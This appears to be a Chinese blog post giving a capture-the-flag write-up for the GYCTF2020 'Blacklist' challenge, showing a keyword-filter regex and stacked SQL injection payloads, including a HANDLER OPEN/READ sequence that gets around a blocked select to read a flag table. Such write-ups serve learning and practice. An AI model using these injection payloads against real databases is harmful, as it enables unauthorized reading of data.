[GYCTF2020]Blacklist

[GYCTF2020]Blacklist

[GYCTF2020]Blacklist(堆叠型注入)

从题目中可以看出来这个是sql注入类型的

 

 查看数据库的数据

1
输入  <br>select 1  <br><br>返回<br>return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

这里过滤了关键字,显然这是字符型注入

没有限制关键字show,通过堆叠注入查看库名

1
1';show databases

 得到上图的回显。

获取表名

1
1';show tables;

得到表名回显

 查看字段

1
1';desc FlagHere;1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;得到flag

select被过滤了,通过文章http://t.zoukankan.com/cmredkulaa-p-14563311.html,了解到可以有几种绕过select限制的方法,这里使用的是handler

 设置payload

 

 

posted @   WuliweiT  阅读(195)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 25岁的心里话
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 按钮权限的设计及实现
点击右上角即可分享
微信分享提示